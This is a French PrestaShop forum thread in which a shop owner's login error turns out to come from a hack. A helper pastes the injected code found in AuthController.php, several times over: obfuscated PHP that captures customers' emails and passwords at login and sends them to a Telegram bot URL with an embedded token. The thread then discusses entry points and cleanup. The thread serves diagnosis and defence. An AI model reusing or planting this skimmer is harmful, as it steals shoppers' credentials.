HTTP ERREUR 500 / * AuthController.php on line 446 ? (xsamxadoo)

[ikaris]

Bonjour et merci d'avance pour votre aide

Version de PrestaShop 1.6.0.14

Depuis cet après midi sans avoir touché à rien j'ai une erreur 500 quand je cherche à me connecter au compte client.

J'ai mis le fichier defines.inc.php en mode débug et j'ai ce message :

Parse error: syntax error, unexpected 'if' (T_IF) /www/controllers/front/AuthController.php on line 446

J'ai vu que ça pouvait venir du passage de mon hébergeur en PHP 7 alors que ma version est pas compatible, mais mon hébergement chez OVH est toujours en 5.6

Quelqu'un pourrait-il m'aider pour trouver le problème...

D'avance un grand merci

Ludovic

Edited August 21, 2020 by ikaris (see edit history)

[Eolia]

Si vous pouviez nous mettre le fichier AuthController.php en pièce-jointe qu'on puisse vérifier qu'il est ok ça serait pas mal^^

[ikaris]

Bonsoir Eolia

merci beaucoup pour votre aide

Le voici

AuthController.php

[Eolia]

Ok... vous vous êtes fait hacker...

Il faut nettoyer votre ftp au plus vite et remettre les fichiers d'origine.

 

Toute cette partie est moisie:

					

        if(strlen(Tools::getValue('passwd'))>3){

			$passwordbajaa=Tools::getValue('passwd');

		}

		if(strlen(Tools::getValue('password'))>3){

			$passwordbajaa=Tools::getValue('password');

		}

        $dhsqndsqdjsqdhsqdqsdhdqs = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";

        $dhsqndsqdjsqdhsqdqsdhdqs .= Tools::getValue('email').":".$passwordbajaa.":".$_SERVER['REMOTE_ADDR'].":".$_SERVER['SERVER_NAME']."\n";

        if(strlen($passwordbajaa) >3){

        Tools::file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot1"."211"."998273".":AAHft2yajX"."qGoX3y_"."K3lfPernQ"."DPbtspu3g"."/sendMessa"."ge?chat_id="."11101654"."05&text=" . urlencode($dhsqndsqdjsqdhsqdqsdhdqs)."" );

		}

		

 i 

        if(strlen(Tools::getValue('passwd'))>3){

			$passwordbajaa=Tools::getValue('passwd');

		}

		if(strlen(Tools::getValue('password'))>3){

			$passwordbajaa=Tools::getValue('password');

		}

        $dhsqndsqdjsqdhsqdqsdhdqs = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";

        $dhsqndsqdjsqdhsqdqsdhdqs .= Tools::getValue('email').":".$passwordbajaa.":".$_SERVER['REMOTE_ADDR'].":".$_SERVER['SERVER_NAME']."\n";

        if(strlen($passwordbajaa) >3){

        Tools::file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot1"."211"."998273".":AAHft2yajX"."qGoX3y_"."K3lfPernQ"."DPbtspu3g"."/sendMessa"."ge?chat_id="."11101654"."05&text=" . urlencode($dhsqndsqdjsqdhsqdqsdhdqs)."" );

		}

		

 i 

        if(strlen(Tools::getValue('passwd'))>3){

			$passwordbajaa=Tools::getValue('passwd');

		}

		if(strlen(Tools::getValue('password'))>3){

			$passwordbajaa=Tools::getValue('password');

		}

        $dhsqndsqdjsqdhsqdqsdhdqs = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";

        $dhsqndsqdjsqdhsqdqsdhdqs .= Tools::getValue('email').":".$passwordbajaa.":".$_SERVER['REMOTE_ADDR'].":".$_SERVER['SERVER_NAME']."\n";

        if(strlen($passwordbajaa) >3){

        Tools::file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot1"."211"."998273".":AAHft2yajX"."qGoX3y_"."K3lfPernQ"."DPbtspu3g"."/sendMessa"."ge?chat_id="."11101654"."05&text=" . urlencode($dhsqndsqdjsqdhsqdqsdhdqs)."" );

		}

		

 i 

        if(strlen(Tools::getValue('passwd'))>3){

			$passwordbajaa=Tools::getValue('passwd');

		}

		if(strlen(Tools::getValue('password'))>3){

			$passwordbajaa=Tools::getValue('password');

		}

        $dhsqndsqdjsqdhsqdqsdhdqs = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";

        $dhsqndsqdjsqdhsqdqsdhdqs .= Tools::getValue('email').":".$passwordbajaa.":".$_SERVER['REMOTE_ADDR'].":".$_SERVER['SERVER_NAME']."\n";

        if(strlen($passwordbajaa) >3){

        Tools::file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot1"."211"."998273".":AAHft2yajX"."qGoX3y_"."K3lfPernQ"."DPbtspu3g"."/sendMessa"."ge?chat_id="."11101654"."05&text=" . urlencode($dhsqndsqdjsqdhsqdqsdhdqs)."" );

		}

		

 i

Je vous joins le bon si vous ne l'avez pas mais ça n'empêche pas le nettoyage à faire...

AuthController.php

[ikaris]

Ouah !!! Mince alors !! Suis dégoutté 🤕

Mille merci Eolia, en effet, je viens de remettre le fichier AuthController.php et c'est Ok, on peut se connecter de nouveau.

Es-ce que je peux passer pas OVh pour restaurer les fichiers d'hier ? 

J'ai eu une commande hier à 18 h et c'était encore bon.

Edited August 23, 2020 by ikaris (see edit history)

[ikaris]

Merci beaucoup Eolia, j'aurai jamais compris tout seul ce qui m'étais arrivé... 🙏

c'est le hack xsamxadoo

Et je vais appliquer la procédure :

https://www.prestashop.com/fr/blog/alerte-securite-votre-boutique-peut-etre-vulnerable

Edited August 19, 2020 by ikaris (see edit history)

[ikaris]

 

→ Si vous n’avez pas trouvé de dossier contenant le dossier phpunit, votre boutique n’est pas vulnérable.

Bizarre, je n'avais aucun phpunit dans le FTP et j'ai été hacké quand même

Edited August 19, 2020 by ikaris (see edit history)

[ikaris]

Voici mes logs d'hier (18 août) au moment du hack :

 

Edited August 30, 2020 by ikaris (see edit history)

[ikaris]

Je crois que j'ai trouvé par où s'est passé. Le module d’installation d'exemple de données qui va avec le template que j'ai acheté sur le site Monster.

J'ai supprimé le module qui est une passoire et qui s'installe tout seul quand vous achetez le template 😤

Merci encore Eolia, 1 h20 du matin... je vais pouvoir aller me coucher, j'espère que ça va être bon 🙏

 

Edited August 23, 2020 by ikaris (see edit history)

[Eolia]

PHPUNIT c'est principalement pour les version 1.7

En 1.6 ce sont des modules qui permettent l'entrée et souvent ceux de JMS...

Le Sample Data Install n'a jamais été répertorié comme ayant une faille...

[ikaris]

Merci Eolia pour tes précisions. C'est quoi JMS ?

J'ai épluché tous les logs sur plusieurs jour et j'ai rien vu de suspect à part ce module d'installation automatique de donnée (Sample data Install)

Edited August 21, 2020 by ikaris (see edit history)

[ikaris]

Bonjour

Quote

 

PHPUNIT c'est principalement pour les version 1.7

En 1.6 ce sont des modules qui permettent l'entrée et souvent ceux de JMS...

 

Je n'ai pas de module JMS à priori. Es-ce que ça veux dire que la totalité des boutiques en 1.6 sont encore vulnérables à ce hack ?

Edited August 21, 2020 by ikaris (see edit history)

[Eolia]

Non mais "Nettoyer votre ftp" ça veut dire rechercher TOUS les fichiers suspects qui n'ont rien à faire là (les hacks en copient un peu partout, dans les css, les répertoires d'images, les fichiers index.php, modifient les contrôleurs dont celui de l'admin, etc...)

Il ne suffit pas de supprimer un ou 2 modules. Ceux-ci peuvent être l'entrée initiale mais si d'autres fichiers ajoutés par les scripts de hackers sont présents sur votre ftp il faut les supprimer aussi.

Ça demande un peu de temps et de méthode.

[ikaris]

Bonjour

J'ai récupéré le site sur le FTP (celui de J-3 avant l'attaque et que j'avais restauré depuis la console OVH le lendemain du hack).

Puis je l'ai comparé avec une ancienne sauvegarde. J'ai pas vu d'autres dossiers suspects. 

Ensuite j'ai fait des recherches avec Netbeams sur  certains termes comme "batajax, xsamxadoo, xsam_baja..." et j'ai rien trouvé.

Je peux être passé à côté de quelque chose, mais je sais pas trop quoi rechercher en fait. je vais encore surveiller les logs quelques jour pour voir si le robot reviens.

C'est une sacrée attaque ce hack quand même !! 

 

[EDIT J+4]

Retour hier du robot mais le module sampledatainstall a été supprimé, c'est OK.

le robot  tente aussi de passer par jmsslider mais qui n'est pas présent sur mon shop (1.6.0.14).

et  attention aussi pour les version 1.7.xxx il faut corriger la faille vendor/..../phpunit car le robot tente aussi par là...

Edited August 30, 2020 by ikaris (see edit history)

[Elkaim orel]

On 8/19/2020 at 9:37 PM, Eolia said:

Si vous pouviez nous mettre le fichier AuthController.php en pièce-jointe qu'on puisse vérifier qu'il est ok ça serait pas mal^^

Bonjour Eolia,

je me permet de vous deranger car j'ai eu un virus de type Bajatax qui c'est introduit sur mon site.

il y'a un mois ce virus ma enlever les coordonnées de virement par de fausse coordonnées de virement vers u compte en espagne.

Des clients sont tombé dans le panneau.et depuis hier ma page pour acceder au paiement à été modifier vers une page frauduleuse.

que faire et quoi verifier svp je suis un peu perdu

 

[Eolia]

Comme expliqué plus haut il faut vérifier l'intégrité des fichiers du ftp, les corriger si nécessaire, supprimer les indésirables et surtout identifier le point d'entrée (module tiers, php_unit, wp ou autre)

[Elkaim orel]

Merci Eolia de ta reponse,mais comment savoir et verifier les fichier du ftp.

Est ce que virus ce place dans un dossier specifique?Est ce que je peux proceder par verifier un fichier specifique et apres continuer mes recherche?

j'ai du mettre mon site en maintenance et c'est vrai que je ne sais par ou commencer....

Mon prestashop à la version 1.6 et je vais passer sur 1.7 est ce que cela va aider?

[Eolia]

Quand on y connait rien ce n'est pas possible.

Le problème ne vient pas de la version Presta mais d'un module tiers mal sécurisé dans 99% des cas.

Une fois celui-ci infecté les scripts se recopient un peu partout, modifient des fichiers etc...